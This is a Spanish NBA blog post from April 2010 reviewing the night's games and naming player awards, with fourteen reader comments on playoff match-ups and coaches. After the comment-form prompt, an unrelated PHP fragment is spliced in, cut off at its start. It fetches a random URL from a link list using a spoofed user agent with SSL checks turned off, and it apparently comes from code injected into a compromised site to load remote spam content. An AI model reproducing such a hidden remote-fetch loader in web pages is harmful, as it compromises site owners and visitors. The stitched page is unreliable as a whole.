La Crónica (12/04/2010)

13 de April de 2010 por TheDeerHunter

Una buena noticia y una mala para los aficionados de los Blazers. La buena es que se ganó a Oklahoma, y se condena a ese equipo a la 8ª plaza de Oeste. Marcus Camby se salió como no lo hacía desde sus mejores tiempos en el Madison. Era el objetivo más inmediato que pretendían cumplir y lo han hecho. La noticia mala es muy mala: Brandon Roy ha sufrido una lesión en el menisco y su participación está seriamente comprometida de cara a playoffs. Sería un amargo epílogo a esta pesadilla de temporada.

Tras el mal de cuerpo que nos deja esta noticia el espectáculo debe continuar en la competición. Los Spurs barrieron a los Wolves, asegurándose el evitar a los Lakers en primera ronda. Es el 11º año consecutivo que alcanzan más de 50 victorias y seguro que ni a Mavs ni a Nuggets les agradará el regalito que les puede tocar en suerte con ellos. Los primeros ganaron sobrados a los Clippers y previsiblemente jugarán al despiste en el último enfrentamiento precisamente contra Spurs. Los Nuggets tampoco tuvieron problemas para ganar a los Grizzlies y cerrarán la regular con una complicada visita a Phoenix.

En el Este, los Hawks dieron buena cuenta de los Bucks en lo que perfectamente podría ser enfrentamiento de primera ronda. En tal caso tendrá que encontrar la manera Schiles para detener a Joe Johnson que anoche les hizo un traje. Por su parte Toronto no dio su brazo a torcer en Detroit y todavía conservan alguna esperanza. Bargnani estuvo especialmente acertado de cara al aro.

Del resto de encuentros podemos destacar que Orlando no afloja un ápice y destrozaron a los Pacers con 42 puntos en un único cuarto. Los Heat ganaron en el último instante a Sixers con clutch de Haslem a pase de Wade. Bobcats cumplió el trámite con los Nets y en dos choques sin ambiciones de por medio los Knicks ganaron a los Wizards y los Rockets a los Kings.

PREMIOS

MVP: Alguien comentaba hace no mucho poco que el fichaje de Marcus Camby por los Blazers había sido un error pero partidos como el de ayer ponen en duda semejante aseveración. 30 puntos, 13 rebotes y victoria en ausencia de Brandon Roy frente a un rival directísimo como los Thunder.

Rookie: Terrence Williams está cuajando un excepcional final de campaña. Si hace poco nos obsequió con un triple doble, anoche se fue a los 21 puntos, 13 rebotes y 6 asistencias. La dura temporada de los Nets le puede haber fortalecido psicológicamente.

Sorpresa: Un día Turkoglu coge 19 rebotes y al otro Andrea Bargnani anota 33 puntos y Amir Johnson 26. Definitivamente, los Raptors están locos.

Decepción: Rudy Fernández ha conseguido temporalmente un puesto en el quinteto titular debido a la baja de Brandon Roy. Estamos seguros que todos esperamos de él algo más que esos 9 puntitos que ha anotado hoy y lo mejor, es que sabemos que puede aportar muchísimo más.

Esfuerzo en vano: Ya hemos hablado de Terrence Williams pero también hay que destacar a Ben Gordon, resucitado en estos últimos compases de la temporada, 24 puntos, 6 rebotes, 4 asistencias y derrota al canto.

Comenta

14 comentarios a esta entrada

  1. Love Denise dice:
    #1

    pues los thunder se enfrentarán a los lakers, lástima para ellos, que no tengan buenos jugadores en la pintura, Gasol y Bynum (si vuelve) les pueden hacer un traje con relativa facilidad. Hoy Camby parecía O’neal, y el center de los Thunders Collison, no ha sido capaz ni de coger un puñetero rebote.Por tanto, las opciones para ellos pasan por las manos de Westbrook (que podría hacer un traje a Fisher) y por Durant, que cada día me gusta más que Lebron.

      Citar

  2. AndiD dice:
    #2

    Estoy de acuerdo con Love. Fisher aún puede tirarse algún clutch, pero ya no está para tanto trote… el otro día A.Miller hizo lo que quiso con él en la segunda parte. Yo creo que una de las claves de PO será ver si Sasha o Farmar se animan a hacer algo más que calentar banquillo.
    Por cierto, se sabe algo de Bynum? Estará listo?
    Y Parker parece que va cogiendo forma para PO… miedito me dan los Spurs.

      Citar

  3. sergio dice:
    #3

    Por mucho que critique a McMillan, hay que reconocer que la capacidad que tiene para sacar partido a sus jugadores, por muchos contratiempos que aparezcan, me parece un grandisimo acierto y le aplaudo en ese aspecto. Ayer saco el quinteto adecuado, con Batum defendiendo a Durant y Rudy a Sefolosha. Aunque sus numeros no fueran impactantes se aplicaron bastante en defensa y sumaron muchos intangibles. Lo que nadie esperabamos era el partidazo de Camby. Quizas si el de Andre Miller.

    Cuidado con los Thunder en primera ronda. Son a los Lakers lo que los Bobcats a los Cavs. Un juego que no les conviene en absoluto. Dudo que den la sorpresa, pero veo menos posible que consigan barrerlos como esperaba de Portland, que se encontrara con un equipo mas acorde a su juego como puede ser Denver. Eso si, la lesion de Roy dilapida muchas de sus posibilidades.

    Hemos dudado mucho de los Spurs (justificadamente), pero ahi andan de nuevo haciendo los numeros de siempre y seguro que incomodaran a cualquier equipo que les pueda tocar. Otro Spurs-Phoenix seria una grandisima noticia para la liga. Esperemos que no se repartan codazos como la ultima vez.

    Hay mono de Playoffs!!!

      Citar

  4. Love Denise dice:
    #4

    Hablando de Bobcats, aunque la clasificación diga que son los séptimos, me parecen mucho mejor equipo que Heat y Bucks (tras la lesión de Bogut). Lo tendrán muy dificil el ganar la serie a Orlando, pero creo que podrían ser capaces de ganar al menos 1 u 2 partidos.

      Citar

  5. Love Denise dice:
    #5

    Morris Almond fichó ayer por el Madrid, qué os parece? yo no podría describirlo, puesto que cuando le he visto con los Jazz, siempre ha jugado menos de 5 minutos. Y este año fichó por los Magic, pero ni siquiera ha jugado un mísero minuto.

      Citar

  6. aro_pasado_no_newtoniano dice:
    #6

    Me parece que la sección de baloncesto no está mucho mejor que la de fútbol. Y en vez de cortar a Bullock cortan a Kaukenas,,,tremenous..

    Go thunder,,go.

    He oido McMillan y no he oido nada sobre su dimisión.

      Citar

  7. Love Denise dice:
    #7

    pero lo de cortar a kaukenas será por alguna razón personal con Messina, no? es que entonces no entiendo el echar a un tío contrastado como Kaukenas que tampoco es que lo haya hecho mal, para fichar a un americano sin experiencia que no se sabe como va a salir. y…por que no juegan más gente como Vidal y velickovic en detrimento de Hansen y Garba?

    Y despues criticais a Mcmilllan, pues el italiano no se queda atrás.

      Citar

  8. TheDeerHunter dice:
    #8

    McMillan…
    Yo estoy deseando que los Blazers jueguen con toda la plantilla disponible, así no habrán excusas para evaluar su trabajo.

    Entrenadores que han sacado rendimiento a equipos del montón hay a patadas. Muchos de ellos fracasan cuando tienen que vérselas con la exigencia más alta. Casualmente McMillan me parece que cumple con todas las características de ese perfil. El barraquismo es una de ellas.

      Citar

  9. LEmontus dice:
    #9

    Mc Millan no es un buen entrenador lo que tiene es un equipazo, y creo que es una locura decir que sabe sacar provecho a sus jugadores…. si hiciera eso estarían mucho mas arriba yo creo que el problema es que ninguno termina de jugar al 100% de sus posibidades. Yo sigo pensando en que pueden liarla en po a pesar de Mc Millan y si vuelve roy claro.

    A spurs no les veo opciones toque quien les toque esto convencido de que no darán un susto.

    Love no se si viste el último partdo de regular season entre Lal-Okc pero la paliza que dieron los thunder fue sobre todo gracias al abuso que se marcó krstic en la primera parte tanto en rebotes como en puntos.(aunque duela destrozó a pau y lamar). Yo creo que una pintura compuesta por Green ibaka collinson y krstic no está nada mal y reunen un poco de todo, además que ibaka promete ser un buen pivot(yo lo veo más de pivot que de 4). Claro que un partido de RS no tiene nada que ver pero bueno la eliminatoria Thunder VS Lakers la veo abierta , no apostaría ciegamente por lakers.

    P.D ¿Habeis visto el tiro medio de Camby? como un tío con esa estética de tiro puede enchufar una canasta…xD

      Citar

  10. sergio dice:
    #10

    LEmontus, a Ibaka le faltan kilitos para ser un pivot con los “bestiajos” que hay ultimamente en la liga. Y supongo que si gana musculo como es previsible, acabara perdiendo salto, uno de sus grandes armas actualmente.

    Yo mantengo que McMillan saca partido de sus jugadores…. en situaciones con el viento en contra. Cuando dispone de todos sus efectivos no es capaz de hacerlo tan bien. Es muy extraño desde luego… Por eso lo puedo comparar con Don Nelson, que tiene mil ases escondidos en la manga para hacer parecer que un equipo mediocre puede funcionar, pero cuando dispone de grandes equipos siempre acaba fracasando estrepitosamente. Por ejemplo, nunca ha llevado a un equipo a las finales de la NBA en sus 30 años como entrenador, cogio a unos Knicks que habian conseguido llegar a la Final y no los devolvio a Playoffs. O el fracaso de los Dallas lideres de Conferencia…, o no llegar a ningun lado con aquellos maravillosos Bucks de los 70.

      Citar

  11. LEmontus dice:
    #11

    Hombre por estar en la nba y la manera en que entrenan allí segúramente le hacen ganar unos kilitos ,pero este año ya ha se ha marcado BUENISIMAS defensas a los mejores pivots con supeso actual y en ataque soprediendo a todos.
    ¿Cres que por que gane unos kilos y con ello mas músculos va a saltar menos? en la nba sobre todo los preparadores físcos(hay otros campos como GM o entrenadores que aveces si parecen un poco tontos) no son tontos no van a hacerle perder salto o atletismo a un jugador como Ibaka pienso yo, aunque todo puede ser.

      Citar

  12. Love Denise dice:
    #12

    Lemontus, No vi el partido que comentas, pero los 4 pivots de Oklahoma me parecen poca cosa para Pau, Odom y Bynum. Dudo mucho que Krstic destroze 4 partidos seguidos a Pau y a Lamar.
    Si los thunders eliminasen a los Lakers (cosa que veo complicada), no creo que sea porque sus pivots dominen a los angelinos, y menos si Andrew Bynum vuelve y está a nivel digno para jugar.

      Citar

  13. sayim dice:
    #13

    Ahora que se acercan los PO, quería saber si en el blog se va a organizar la porra de la que se hablaba hace un par de semanas. Es que algunos aún no conocíamos este magnífico blog en la pretemporada y no pudimos participar en la porra. Ahí dejo el guante, por si los “jefes” de todo esto quieren recogerlo

    Lemontus, si el juego interior de Thunder dominara al de Lakers serían claros favoritos en la serie. Durant está a un nivel impresionante en los dos lados de la cancha (porque nadie habla de la defensa de este chico) con lo que su aportación será similar a la de Kobe, Artest no está teniendo demasiada presencia en ataque (fallando bastante en el tiro de 3 en estático, su principal cometido) y en los respectivos puestos d base no hay color (que mal lo va a pasar Fisher con la velocidad de Westbrook).

    Un saludo

      Citar

  14. LEmontus dice:
    #14

    No he dicho en ningún momento que la pintura vaya a ser dominada por el juego interior de Thunder he dicho que los hombres altos de thunder pueden hacerlo bien y plantarle cara al juego interior de Lakers.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>